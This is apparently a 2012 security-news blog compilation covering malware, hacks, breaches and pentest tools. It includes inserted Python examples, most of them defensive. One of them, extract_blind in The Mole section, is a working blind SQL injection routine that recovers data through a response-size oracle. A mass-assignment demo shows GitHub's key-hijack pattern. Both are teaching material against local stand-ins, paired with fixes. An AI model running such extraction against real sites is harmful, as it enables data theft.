Saturday, March 10, 2012

Bugtraq-I : Distribution for Pentesting and forensics



Bugtraq is a penetration-testing and forensics distribution built on the 2.6.38 kernel, with a wide range of pentest and forensic tools. It can be installed from a Live DVD or USB drive; the distribution is customized down to the last package, and the kernel has been patched for performance and for broader hardware support, including wireless injection patches that other distributions do not carry.
Some of its notable features are:
· Administrative improvements for better management of system services.
· A wider range of wireless drivers with injection support.
· Kernel 2.6.38 patched to recognize 4 GB of RAM on 32-bit systems.
· Tools configured out of the box, with automated installation scripts for Nessus, OpenVAS, Greenbone, NOD32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG and others.
· Scripts written by the Bugtraq team (SVN tool updates, track deletion, backdoors, Spyder-sql, etc.).
· Stability and performance tuning: improved Flash and Java performance, and unnecessary services are purged at boot so that only the services the user actually wants are running.
· User creation is part of the installer, and the new user is created with all system configuration in place.
· Aims to be the pentesting and forensics distribution with the most tools installed and working, organized in a menu without duplicate entries so the user is not overwhelmed.


Duqu Trojan developed in unknown programming language

Researchers at Kaspersky have reached out for assistance after an investigation into the Duqu Trojan uncovered a section that is written in an unknown programming language.

The Russian security company says this new information could help them discover how the worm was able to communicate with its Command and Control (C&C) servers. The C&C servers essentially tell the worm what to do once it has accessed a system.

While most of Duqu is written in C++, the component Kaspersky calls the Duqu Framework, which handles the C&C communication, is not; nor was it compiled with Microsoft's Visual C++ 2008. Other languages ruled out include Python, Java, Objective C, Ada and Lua. “Given the size of the Duqu project, it’s possible that an entirely different team was responsible for creating the Duqu Framework as opposed to the team that created the drivers and wrote the system infection exploits,” said Alexander Gostev, chief security expert at Kaspersky Lab, in a statement.
The mysterious code could be the work of a separate collaborator, indicating that multiple parties worked to develop the infection. Kaspersky is hoping that someone in the programming community will recognize the language and come forward to identify it. Identifying it could help analysts build a profile of Duqu's authors, particularly if the language can be tied to a group known to use it, or even to the people behind its development.

Duqu first emerged in September 2011 and is thought to have been written by the same people behind the infamous Stuxnet worm, which targeted Iran's nuclear facilities. Where Stuxnet was built to sabotage, Duqu acts as a backdoor into a system to steal data.

Researchers have noted a number of similarities in the behaviour and spread of Duqu with the infamous Stuxnet malware, leading some researchers to dub Duqu as the successor to Stuxnet.

Albania is the most Malware infected Nation




Researchers at the security firms Norman and Microsoft, analysing data from their security products, report that Albania is the most malware-infected nation, with 65% of scanned computers reporting infections. The rest of Norman's most-infected list is South Korea, Guatemala, Vietnam, Indonesia, Argentina, Thailand, Georgia, the Philippines, Algeria, Venezuela, Lithuania and Pakistan.
Microsoft's data shows that the most common threat category in Albania in the second quarter of 2011 was worms, which affected 43.7 percent of all computers cleaned in Albania, down from 44.9 percent in the first quarter of 2011.

The most common threat family in Albania in Second quarter of 2011 was Win32/Autorun, which affected 25.2 percent of computers cleaned in Albania. Win32/Autorun is a family of worms that spreads by copying itself to the mapped drives of an infected computer. The mapped drives may include network or removable drives.

The following table lists the top botnets actively sending spam from Albania during 2011, by share of the botnet IP addresses observed in the country:

    Rank  Botnet          % of all botnet IP addresses in Albania
    1     Win32/Pramro    30.1%
    2     Win32/Lethic    27.5%
    3     Win32/Cutwail   16.8%


Other reports show that Finland has the lowest infection rate in the world, with 24.31% of scanned computers containing malware such as a virus, spyware or a trojan.

FBI get 4 more months to fight with DNSChanger


On March 5th, a US District Court in New York signed an order extending the March 8th deadline to July 9th. The extension gives affected organisations more time to track down and remediate hosts that are still compromised; current data indicates that there are still several million infected or affected hosts worldwide.

Over the last month, the temporary servers routed an average of 430,000 infected IP addresses according to the government request for extension. Security firm Internet Identity also found that at least 94 Fortune 500s and three major government agencies are still infected with DNSChanger. The remaining infected systems will now have an additional four months to get rid of the malware before having their DNS pulled.
The malware hijacked users' clicks by modifying their computers' domain name system (DNS) settings so that URL requests went to the criminals' own resolvers, a tactic that shunted victims to attacker-controlled sites resembling the real domains.

It's estimated that DNSChanger generated close to $14 million in illicit advertising money via click hi-jacking and replacing online ads. The six individuals who were allegedly responsible for releasing the malware have been cleared for extradition by an Estonian court to face trial in the US.

"There has been significant progress within the government and enterprise, where it's easier to clean things up, but ISPs have been slower, in part because some of them are still trying to figure out how best to handle the situation," said Rod Rasmussen, president and CTO at IID.

To find out whether your computer or network router is infected with DNSChanger, check which DNS servers it is configured to use against the rogue address ranges the FBI published. If you are infected, get a serious anti-virus security suite, update it and run a full system scan; if that does not clean the machine, contact a computer professional.
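A way to do that check yourself, as an added example that is not part of the original post or of any DNSChanger Working Group tool: the script below parses the resolver addresses out of a Unix /etc/resolv.conf or Windows "ipconfig /all" output and tests them against the six rogue address ranges the FBI published for DNSChanger. The configuration text is constructed; verify the range list against the FBI notice before relying on it. A clean resolv.conf is not proof of health on its own, since DNSChanger also rewrote the DNS settings of home routers, so run the same check on the router's WAN DNS settings.

```python
import ipaddress
import re

# Rogue resolver ranges from the FBI's public DNSChanger notice. Reproduced here
# from that notice; verify the list against it before relying on this script.
ROGUE_RANGES = [ipaddress.ip_network(cidr) for cidr in (
    "85.255.112.0/20",   # 85.255.112.0  - 85.255.127.255
    "67.210.0.0/20",     # 67.210.0.0    - 67.210.15.255
    "93.188.160.0/21",   # 93.188.160.0  - 93.188.167.255
    "77.67.83.0/24",     # 77.67.83.0    - 77.67.83.255
    "213.109.64.0/20",   # 213.109.64.0  - 213.109.79.255
    "64.28.176.0/20",    # 64.28.176.0   - 64.28.191.255
)]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def rogue_network(ip):
    """Return the rogue range (as a string) that contains ip, or None if clean."""
    addr = ipaddress.ip_address(ip)
    for net in ROGUE_RANGES:
        if addr in net:
            return str(net)
    return None


def resolvers_from_resolv_conf(text):
    """Nameserver addresses from a Unix /etc/resolv.conf."""
    return re.findall(r"^\s*nameserver\s+(\S+)", text, re.MULTILINE)


def resolvers_from_ipconfig(text):
    """DNS server addresses from Windows 'ipconfig /all' output.

    The first address follows 'DNS Servers ... :' on the same line; further
    addresses sit on indented continuation lines until the next 'key : value'
    line. Only IPv4 is collected, which is what DNSChanger rewrote."""
    servers, collecting = [], False
    for line in text.splitlines():
        if "DNS Servers" in line:
            collecting = True
            line = line.split(":", 1)[1]
        elif collecting and ":" in line:
            collecting = False
        if collecting:
            servers.extend(IPV4.findall(line))
    return servers


def check_resolvers(ips):
    """Map each resolver address to the rogue range it falls in (None if clean)."""
    return {ip: rogue_network(ip) for ip in ips}


# Constructed samples, not captures from a real machine.
SAMPLE_RESOLV_CONF = """# Generated by NetworkManager
nameserver 85.255.112.8
nameserver 8.8.8.8
"""

SAMPLE_IPCONFIG = """Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 192.168.1.20
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 93.188.161.2
                                       192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    for source, ips in (("resolv.conf", resolvers_from_resolv_conf(SAMPLE_RESOLV_CONF)),
                        ("ipconfig", resolvers_from_ipconfig(SAMPLE_IPCONFIG))):
        for ip, hit in check_resolvers(ips).items():
            print(f"{source}: {ip:<16} {'ROGUE ' + hit if hit else 'ok'}")
```

On a live machine, feed the function the real file contents (`open("/etc/resolv.conf").read()` or the captured output of `ipconfig /all`) instead of the samples; a resolver inside one of these ranges means the settings were rewritten and should be changed back before the temporary servers are switched off.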


#AntiSec hackers deface Panda Security site to protest LulzSec arrests



Hackers aligned with Anonymous took credit on Wednesday for an attack on Panda Security's website, shortly after charges were announced against five of the collective's alleged members.

Over 25 websites related to Panda Security were defaced tonight by AntiSec, and email addresses and MD5 password hashes were leaked publicly. Anonymous accused Panda of helping the FBI track Anonymous members; the attacks are believed to be retaliation for the recent FBI arrests.
Yesterday's biggest story in the hacking world was that the man described as the ringleader of LulzSec and an influential member of Anonymous, Hector Xavier Monsegur, turned against his comrades because he did not want to go to prison and leave behind his two children. Monsegur pleaded guilty to a dozen hacking-related charges last summer, crimes which carry a maximum sentence of 124 years and six months in prison. Rather than face a lengthy jail sentence and not see his children, the unemployed father agreed to cooperate with the FBI and has reportedly been working with them since his arrest to bring down the groups' top hackers.

The charged LulzSec hackers are:
Ryan Ackroyd a.k.a. Kayla, lol, lolsoon
Jake Davis a.k.a. topiary, atopiary
Darren Martyn a.k.a. pwnsauce, raepsauce, networkkitten
Donncha O'Cearrbhail a.k.a. palladium
Hector Xavier Monsegur a.k.a. Sabu, Xavier DeLeon, Leon
Jeremy Hammond a.k.a. Anarchaos, sup_g, burn, yohoho, POW, tylerknowsthis, crediblethreat

List of Defaced Sites :
  1. cybercrime.pandasecurity.com
  2. antivirus-offers.pandasecurity.com
  3. blog.cloudantivirus.com
  4. cloudofficeprotection.pandasecurity.com
  5. cloud.pandasecurity.com
  6. cloudpartnercenter.pandasecurity.com
  7. cloudprotectionbeta.pandasecurity.com.tar.gz
  8. cloudprotection.pandasecurity.com
  9. facebookfriends.pandasecurity.com
  10. forgetsecurity.co.uk
  11. forgetsecurity.co.za
  12. forgetsecurity.es
  13. go.pandasecurity.com
  14. info.pandasecurity.com
  15. information.pandasecurity.com
  16. lavuelta.pandasecurity.com
  17. maintenance.pandasecurity.com
  18. momentos.pandasecurity.com
  19. ondersteuning.pandasecurity.com
  20. pandacompetition.pandasecurity.com
  21. pandalabs.pandasecurity.com
  22. prensa.pandasecurity.com
  23. press.pandasecurity.com
  24. promo.pandasecurity.com
  25. protectyourfamily.pandasecurity.com
  26. research.pandasecurity.com
  27. securitytothecloud.pandasecurity.com
  28. serviciospro.pandasecurity.com
  29. servicos.pandasecurity.com
  30. suporte.pandasecurity.com
  31. techcenter.pandasecurity.com
  32. uninstall.cloudantivirus.com
  33. wiki.cloudantivirus.com
  34. www.cnccs.es
  35. www.forgetsecurity.de

"Pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has been earning money working with Law Enforcement to lurk and snitch on anonymous activists. They helped to jail 25 anonymous in different countries...yep we know about you. How does it feel to be the spied one?"

In August, 2011, it came to light that Anonymous had hacked into 70 law enforcement websites, mostly local sheriffs’ websites in Missouri.The hacks had occurred four weeks before they were discovered. Using information passed on by Monsegur, the FBI was able to work with the server company to mitigate the damage. The FBI then alerted 300 government, financial and corporate entities around the world to potential vulnerabilities in their computer systems.

AntiSec also voiced support for those fighting for their freedom in Tunisia, Egypt, Libya, Syria, Bahrain, Yemen and Iran. It also dared the FBI to come for its members: "we are waiting for you."

Rogue Antivirus advertised on 200000 hacked Web pages


Websense has detected a new wave of mass injections from a well-known rogue antivirus campaign; the attack has infected over 200,000 web pages on close to 30,000 unique web hosts.

The attack uses SQL injection techniques to insert a rogue script element. Users who land on one of the compromised pages get redirected through several domains and finally land on a scareware site. These sites mimic antivirus scans and tell visitors their computers are infected with malware in an attempt to convince them to download fake security programs. The programs display even more false warnings and ask users to pay for a license in order to clean their machines.
The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it. The fake antivirus then prompts visitors to download and run their "antivirus tool" to remove the supposedly found Trojans. The executable is itself the Trojan.

More than 85% of the compromised websites are located in the United States. That does not mean only US users are exposed: the sites are also visited by users in Turkey, Brazil, the UK, India, China, South Africa, Jordan, Canada, the Philippines and Taiwan.

Mass injection attacks are a common malware infection vector. The hackers exploit the trust users associate with the infected sites in order to push scareware or launch drive-by downloads. In other circumstances, the search engine rank of compromised sites can be exploited to poison search results for popular keywords with malicious links in what is known as black hat SEO attacks.
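As an added example (not Websense's code and not part of the original post), the scanner below is the kind of check a site owner can run over a database dump after an injection of this sort: it parses every stored HTML field, pulls out the src of each script element and flags any that point at a host outside an allowlist of the site's own hosts. The table rows and the hostnames are constructed placeholders, not domains from the real campaign.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> element in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def script_sources(html):
    parser = ScriptSrcCollector()
    parser.feed(html)
    return parser.sources


def foreign_scripts(html, allowed_hosts):
    """Script sources whose host is not in allowed_hosts.

    Relative URLs (no host) are treated as same-origin and ignored; protocol-
    relative '//host/x.js' and absolute URLs are checked by host."""
    found = []
    for src in script_sources(html):
        host = urlsplit(src).hostname
        if host is None:
            continue
        if host.lower() not in allowed_hosts:
            found.append(src)
    return found


def scan_rows(rows, allowed_hosts):
    """Run the check over (table, row_id, column, text) tuples dumped from the CMS
    database and report the rows carrying scripts from unexpected hosts."""
    hits = []
    for table, row_id, column, text in rows:
        srcs = foreign_scripts(text, allowed_hosts)
        if srcs:
            hits.append((table, row_id, column, srcs))
    return hits


# Constructed sample rows; hostnames are placeholders, not real campaign domains.
SAMPLE_ROWS = [
    ("posts", 1, "body", "<p>Welcome</p><script src=\"/js/site.js\"></script>"),
    ("posts", 2, "body", "<p>News</p><script src=\"http://cdn.example.com/app.js\"></script>"),
    ("posts", 3, "body",
     "<p>Contact</p></div><script src=\"http://injected.invalid/r.php\"></script>"),
    ("comments", 9, "text", "nice post <script src='//injected.invalid/r.php'></script>"),
]
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

if __name__ == "__main__":
    for table, row_id, column, srcs in scan_rows(SAMPLE_ROWS, ALLOWED_HOSTS):
        print(f"{table}#{row_id}.{column}: {', '.join(srcs)}")
```

Because the injection writes into every text column the vulnerable query can reach, the scan should cover all text columns of all tables, not just the obvious page body; the row identifiers it returns are what you need to clean the data and to go back through the web logs for the request that planted it.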

DarkComet RAT Remover Released


The civil war in Syria rages not only on the ground but also on the internet. The opposition has made increasing use of platforms such as Facebook to organize and spread its message; in response, the regime has tried to disrupt these activities by defacing websites and spamming Facebook pages.
The regime is also using the DarkComet RAT (detected by Microsoft as Backdoor:Win32/Fynloski.A) to spy on its own people. The creator of DarkComet, disgusted by that use, has responded with a purpose-built tool to detect and remove his own RAT, DarkComet RAT Remover, to help the affected Syrian users.

DarkComet RAT Remover detects any instance of DarkComet running in memory, even if the attacker has obfuscated the loader to evade common antivirus software; it also detects the registry changes DarkComet makes and its keylogger logs.

Features:
[+] Detect DarkComet Even if crypted.
[+] Detect DarkComet Even if visualized.
[+] Detect DarkComet Even if injected in a remote process.
[+] Detect DarkComet Even if Protected / Packed.
[+] Detect Registry Changes by DarkComet.
[+] Detect Keylogger logs.


#Security Alert : Facebook Two-Factor Authentication fail !


Last year Facebook launched a security feature called Login Approvals, its form of two-factor authentication, as a follow-up to its earlier login alerts, which notify you by email or SMS when your account is used from an unfamiliar location.
Christopher Lowson explains on his blog why Facebook's two-factor authentication is another Facebook security fail.

Login alerts alone are not enough to secure an account, which is why Facebook launched Login Approvals. The feature is very similar to Google's 2-step verification: it associates a mobile device with your Facebook account and authenticates a login by sending a verification code to that phone.

When someone logs into your account from a new device, a code is sent to your phone, and it must be entered before access is granted.

What Lowson did: on the code prompt he clicked "I can't get my code", noticed the option "Skip this and stop asking me to enter codes", and after clicking it was asked "Log in without entering codes from now on?". He was then logged in without a code, with Login Approvals turned off: the second factor was bypassed by nothing more than menu options.

The conclusion is that a security feature which can be disabled from the very prompt it is meant to guard is easily defeated at the user end, and only a very small percentage of Facebook users even know the feature exists, a year after it launched.
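An added example, written for this post rather than taken from Facebook or from Lowson's write-up, of the policy that was missing: turning off login approvals must itself be authenticated with the second factor. The account model, device tracking and code generation are assumptions standing in for Facebook's (its codes were SMS-delivered, not TOTP); the TOTP routine follows RFC 6238 so its output can be checked against that RFC's test vector.

```python
import hashlib
import hmac
import os
import struct
import time


def totp(secret, at, digits=6, step=30):
    """RFC 6238 TOTP (HMAC-SHA1) for the Unix time `at`."""
    counter = struct.pack(">Q", int(at) // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{value % 10 ** digits:0{digits}d}"


class Account:
    """Hypothetical account record: password hash, shared TOTP secret, and the
    devices that have already presented a valid code."""

    def __init__(self, password, totp_secret):
        self.salt = os.urandom(16)
        self.password_hash = self._hash(password, self.salt)
        self.totp_secret = totp_secret
        self.login_approvals = True       # second factor required on new devices
        self.known_devices = set()

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def check_password(self, password):
        return hmac.compare_digest(self.password_hash, self._hash(password, self.salt))

    def check_code(self, code, now=None):
        """Accept the current code or its immediate neighbours (clock skew)."""
        now = time.time() if now is None else now
        return any(hmac.compare_digest(code, totp(self.totp_secret, now + d))
                   for d in (-30, 0, 30))


def login(acct, password, device_id, code=None, now=None):
    """Password always; a code as well when approvals are on and the device is new."""
    if not acct.check_password(password):
        return False
    if acct.login_approvals and device_id not in acct.known_devices:
        if code is None or not acct.check_code(code, now):
            return False
        acct.known_devices.add(device_id)
    return True


def disable_approvals_skip_link(acct):
    """The flaw Lowson describes: a 'stop asking me for codes' option reachable
    from the code prompt itself, i.e. by anyone who already has the password."""
    acct.login_approvals = False
    return True


def disable_approvals(acct, password, code, now=None):
    """Turning the second factor off must be authenticated at least as strongly
    as the factor being removed: password plus a current code, or it stays on."""
    if not (acct.check_password(password) and acct.check_code(code, now)):
        return False
    acct.login_approvals = False
    return True


if __name__ == "__main__":
    secret = os.urandom(20)
    acct = Account("correct horse", secret)
    print("new device, password only:", login(acct, "correct horse", "laptop"))
    print("new device, with code:", login(acct, "correct horse", "laptop", totp(secret, time.time())))
    print("skip link disables approvals:", disable_approvals_skip_link(acct))
    print("new device, password only now:", login(acct, "correct horse", "other-laptop"))
```

The same rule applies to every path that weakens an account (changing the phone number, removing trusted devices, resetting the password): each must demand the strongest credential the account currently has, otherwise the weakest path is the one attackers take.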

THOR : Another P2P Botnet in development with extra stealth features


Researchers are now focusing on peer-to-peer (P2P) concepts as incremental improvements to distributed malicious software networks, now generically referred to as botnets. Because botnets can be used for illicit financial gain, they have become very popular in recent Internet attacks.

A botnet is a network of computers that are compromised and controlled by an attacker. Each computer is infected with a malicious program called a bot, which actively communicates with other bots in the botnet or with several bot controllers to receive commands from the botnet owner. Attackers maintain complete control of their botnets and can conduct Distributed Denial-of-Service (DDoS) attacks, email spamming, keylogging, abuse of online advertisements, spreading of new malware, and so on.
P2P botnets, in which the compromised machines relay commands among themselves instead of contacting a central server, have already appeared in the wild. Thor follows that model: it has its own code base, but keeps the spreading strategy and the multi-relay (peer-to-peer) infrastructure of its predecessors.

Thor is a decentralised P2P botnet, coded in C/C++ and developed by "TheGrimReap3r", that has been in development for some time and is almost ready for sale. The botnet has no central command point, so it will be very difficult to shut down, and very difficult to trace where commands come from, because every node passes them on.

Thor uses DLL injection, IAT hooking and a ring-3 (user-mode) rootkit, among other things, to hide. It also has its own module system, so buyers can write their own modules against the author's API. Peer-to-peer communication is encrypted with AES-256, with a random key generated at each startup.

Thor works on Windows 2000 and later: Windows XP SP0 to SP3, Vista SP0 to SP2 and Windows 7 SP0/SP1, on both x86 and x64.

The developers intend to sell Thor openly on the underground market and on hacking forums at $8,000 for the package without modules; the modules expected to be offered are an advanced bot killer, DDoS, form grabber, keylogger/password stealer and mass mailer.

Hackers steal Michael Jackson's entire back catalog from Sony


Entertainment giant Sony has confirmed that hackers accessed its systems and compromised Michael Jackson's entire back catalogue, including many unreleased songs.

Sony Music suffered its second major security breach in a year, with thieves targeting songs and unreleased material by the singer. It is alleged they downloaded more than 50,000 music files worth $253 million, in the biggest ever cyberattack on a music company. The news comes just a year after Sony paid $395 million for seven-year rights to the songs following Jackson's death.

The purchase came with a stash of unreleased tracks, including duets Jackson recorded with the late Queen singer Freddie Mercury and with Black Eyed Peas star will.i.am, 36. Sony had been planning to release them on up to 10 albums, which would have netted a fortune.
It is thought that the hack occurred around the same time Sony's PlayStation Network (PSN) was hacked in April 2011 but was not noticed at the time, and that the breach was only spotted through monitoring of social networks and Michael Jackson fan sites. "Everything Sony purchased from the Michael Jackson estate was compromised," a source said. "It caused them to check their systems and they found the breach. There was a degree of sophistication. Sony identified the weakness and plugged the gap."

The hack has compromised the work of other artists managed by the firm, including songs by Jimi Hendrix, Paul Simon, Olly Murs, the Foo Fighters and Avril Lavigne. Two men appeared in court in the UK on Friday accused of offences in connection with the alleged security breach.James Marks, 26, and James McCormick, 25, denied charges under the Computer Misuse Act and the Copyright, Designs and Patents Act and were bailed. They are due to stand trial next January.

It's unclear who stole the recordings, and if it was the same attackers responsible for the massive PlayStation breach which compromised the accounts of millions of Sony customers. So far, it appears as though the recordings have not been leaked to the Internet, but it's possible that could happen unless the hacker just plans to keep them for his or her own listening enjoyment.

The Mole v0.3 Released : Automatic SQL Injection Exploitation Tool


Nasel has just released a new version of The Mole, an automatic SQL injection exploitation tool. Given only a vulnerable URL and a string that appears on the page, it can detect the injection and exploit it, using either the UNION technique or a boolean-based blind technique.
This release introduces new features over the previous one. The Mole can now exploit injections through cookie parameters. A promising new feature is the exploitation of injections that return binary data: instead of downloading the whole binary, The Mole sends HEAD requests and analyses the response headers, since the size of the binary to download usually differs depending on whether the injected condition was true or false.

There has also been a major change in The Mole's architecture, which now allows filters to be inserted easily in order to bypass IPS/IDS rules or modify the query at runtime. A tutorial on writing these filters is in the tutorial section of the tool's site.
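As an added example, not The Mole's own code, here is the size-oracle idea from the paragraphs above in miniature: an in-memory SQLite application with a deliberately vulnerable download endpoint stands in for the target, content_length() plays the part of a HEAD request (the attacker learns the body size, never the body), and extract_blind() recovers a value one character at a time by binary search on the injected condition. The parameterized variant of the same endpoint shows the fix. The table contents and the blob are constructed.

```python
import sqlite3

PNG_BLOB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 4089   # constructed 4097-byte "image"


def build_app(parameterized):
    """In-memory stand-in for the target site: download(id) returns a binary file.

    parameterized=False concatenates the id into the SQL (the injection);
    parameterized=True binds it as an integer, which is the fix."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")
    db.execute("CREATE TABLE files(id INTEGER, data BLOB)")
    db.execute("INSERT INTO files VALUES (1, ?)", (PNG_BLOB,))

    def download(id_param):
        if parameterized:
            row = db.execute("SELECT data FROM files WHERE id = ?",
                             (int(id_param),)).fetchone()   # ValueError on junk
        else:
            row = db.execute("SELECT data FROM files WHERE id = " + id_param).fetchone()
        return row[0] if row else b""     # empty body when the WHERE clause is false

    return download


def content_length(app, id_param):
    """All a HEAD request yields: the body size, without transferring the body."""
    return len(app(id_param))


def extract_blind(app, subquery, max_len=64):
    """Recover a scalar subquery's result using only whether an injected condition
    leaves the Content-Length equal to that of the genuine response.

    Characters are assumed to be ASCII (code points 0-127)."""
    baseline = content_length(app, "1")

    def holds(condition):
        return content_length(app, f"1 AND ({condition})") == baseline

    def lowest_false(greater_than, lo, hi):
        # binary search: greater_than(n) answers "is the target > n?"
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(mid):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = lowest_false(lambda n: holds(f"length(({subquery})) > {n}"), 0, max_len)
    result = []
    for pos in range(1, length + 1):
        code = lowest_false(
            lambda n: holds(f"unicode(substr(({subquery}), {pos}, 1)) > {n}"), 0, 127)
        result.append(chr(code))
    return "".join(result)


if __name__ == "__main__":
    target = build_app(parameterized=False)
    print(extract_blind(target, "SELECT password FROM users WHERE name='admin'"))
```

With binary search each character costs about seven requests, so a six-character value takes roughly fifty HEAD requests and never transfers the 4 KB body; on a real target the same loop would go through an HTTP client and compare the Content-Length header. The parameterized endpoint rejects the payload before it reaches the database, which is the whole of the defence.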

Features:
  • Support for injections against MySQL, SQL Server, PostgreSQL and Oracle databases.
  • Command line interface; different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and column names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, with the possibility of creating new ones easily.
  • Exploits SQL injections through GET/POST/Cookie parameters.
  • Developed in Python 3.
  • Exploits SQL injections that return binary data.
  • Powerful command interpreter to simplify its usage.

FOCA PRO 3.1 and MetaShield Protector Released


Forensic FOCA
A new version of FOCA was announced today, in this case Forensic FOCA. This tool is made for forensic analysts, allowing them to extract metadata from files and build a timeline from it.

This information lets you reconstruct what happened on a machine just by analysing which documents were created between two dates, which files were created by one user in a period of time, or which users were working on a single machine on a given day.

The tool can export all the data, including file hashes, to XML reports that can be integrated into any other reporting system. A Forensic FOCA licence costs only 20 € per year, and you can buy it online or test the trial version.

More info at: http://www.informatica64.com/ForensicFOCA/
New FOCA PRO with Plugins
FOCA PRO now has plugin support. It currently ships with a set of plugins to analyse .svn/entries files, a web fuzzer and a MySQL injector, extending what FOCA can do.

If you attended an online seminar in the last year, you will receive an e-mail this week with the link and licence for the new FOCA PRO 3.1. If you want to try it, register for the next online training and get it with the course.

The free version can be downloaded from http://www.informatica64.com/foca.aspx, and there is an online version that extracts metadata from uploaded files at http://www.informatica64.com/foca/

MetaShield Protector
Finally, a reminder about our solution for cleaning metadata from files published on web servers running Microsoft IIS: MetaShield Protector is an IIS plugin that lets you configure a metadata policy for the documents your web server serves.


GitHub hacked with Ruby on Rails public key vulnerability


GitHub, the service that many professional programmers use to store their work and collaborate on code, was hacked over the weekend. A young Russian developer, Egor Homakov, exploited a gaping vulnerability in GitHub that allowed him (or anyone else with basic know-how) to gain commit access to projects such as Ruby on Rails, Linux and millions of others.

When GitHub saw what had happened it suspended Homakov's account, which created a firestorm of protest, including a blog post entitled "GitHub, You Have Let Us All Down". The flaw was a mass-assignment hole in GitHub's own Ruby on Rails application, in its public-key form: by submitting, along with his SSH public key, a form parameter that assigned the key to a Rails maintainer's account, Homakov had Git treat his key as that maintainer's and accept his pushes to the Rails repository. That would entitle him not only to commit files but, in principle, to wipe the entire project and its history.

"The root cause of the vulnerability was a failure to properly check incoming form parameters, a problem known as the mass-assignment vulnerability," GitHub co-founder Tom Preston-Werner wrote in a blog post.
"Two days ago he responsibly disclosed a security vulnerability to us and we worked with him to fix it in a timely fashion. Today, he found and exploited the public key form update vulnerability without responsible disclosure," Preston-Werner said, explaining that this had meant Homakov had broken GitHub's terms and conditions.

GitHub is used by a number of high-profile projects including the Linux kernel. Homakov exploited a well-known weakness of Ruby on Rails applications, and questions might be asked as to why GitHub's administrators did not close it sooner.

Moving forward, GitHub has apologised for being unclear about how white-hat hackers should disclose security vulnerabilities and has set up a new help page that spells out how to report issues.
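The following is an added example, not GitHub's code or the Rails API, that shows the mass-assignment pattern quoted above in Python with a hypothetical public-key model: the vulnerable update writes every submitted form field to the record, so a smuggled user_id re-homes the key to a maintainer's account and Git then accepts pushes with it; the fixed update takes ownership from the session and writes only an allowlist of fields. In Rails 3 the equivalent fix is attr_accessible on the model (or config.active_record.whitelist_attributes = true). The repository, users and key strings are constructed.

```python
class PublicKey:
    """Hypothetical model for an SSH key attached to a user account."""

    def __init__(self, key_id, user_id, title, key):
        self.id, self.user_id, self.title, self.key = key_id, user_id, title, key


class Repository:
    """Hypothetical repository with a set of maintainer user ids."""

    def __init__(self, name, maintainer_ids):
        self.name, self.maintainer_ids = name, set(maintainer_ids)

    def can_push(self, public_key):
        """What git sees at push time: whoever the presented key belongs to."""
        return public_key.user_id in self.maintainer_ids


def update_key_mass_assign(public_key, params):
    """Vulnerable: every submitted form field is written to the record, so a
    user_id field smuggled into the request re-homes the key to another account."""
    for name, value in params.items():
        setattr(public_key, name, value)
    return public_key


PERMITTED_FIELDS = frozenset({"title", "key"})


def update_key_allowlisted(public_key, params, current_user_id):
    """Fixed: ownership comes from the session rather than the request, only the
    fields the form is meant to edit are written, and unexpected fields are
    rejected outright instead of being silently dropped."""
    if public_key.user_id != current_user_id:
        raise PermissionError("key does not belong to the current user")
    unexpected = set(params) - PERMITTED_FIELDS
    if unexpected:
        raise ValueError(f"unpermitted fields: {sorted(unexpected)}")
    for name in PERMITTED_FIELDS & set(params):
        setattr(public_key, name, params[name])
    return public_key


# Constructed scenario: user 7 (the attacker) owns key 42; user 1 maintains rails/rails.
ATTACKER_ID, MAINTAINER_ID = 7, 1
rails = Repository("rails/rails", maintainer_ids={MAINTAINER_ID})


def tampered_params():
    """The form post with the extra field the form never offered."""
    return {"title": "laptop", "key": "ssh-rsa AAAA...attacker", "user_id": MAINTAINER_ID}


if __name__ == "__main__":
    key = PublicKey(42, ATTACKER_ID, "laptop", "ssh-rsa AAAA...attacker")
    print("before:", rails.can_push(key))
    update_key_mass_assign(key, tampered_params())
    print("after mass assignment:", rails.can_push(key))
    key2 = PublicKey(43, ATTACKER_ID, "laptop", "ssh-rsa AAAA...attacker")
    try:
        update_key_allowlisted(key2, tampered_params(), current_user_id=ATTACKER_ID)
    except ValueError as e:
        print("allowlisted update rejected:", e)
```

Rejecting rather than dropping unexpected fields matters for detection: a silently discarded user_id leaves no trace, while a rejected request can be logged, and repeated rejections from one account are exactly the signal that someone is probing the form.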

BackTrack 5 R2 Released, New Kernel, New Tools


Hackers, are you ready? BackTrack 5 R2 has finally been released, with bug fixes, upgrades and 42 new tools. It ships a custom-built 3.2.6 kernel with the best wireless support available, at maximum speed. The release includes Metasploit 4.2.0 Community Edition, version 3.0 of the Social-Engineer Toolkit, BeEF 0.4.3.2 and many other tool upgrades.

Backtrack also added the following new tools to R2:
  • arduino
  • bluelog
  • bt-audit
  • dirb
  • dnschef
  • dpscan
  • easy-creds
  • extundelete
  • findmyhash
  • golismero
  • goofile
  • hashcat-gui
  • hash-identifier
  • hexorbase
  • horst
  • hotpatch
  • joomscan
  • killerbee
  • libhijack
  • magictree
  • nipper-ng
  • patator
  • pipal
  • pyrit
  • reaver
  • rebind
  • rec-studio
  • redfang
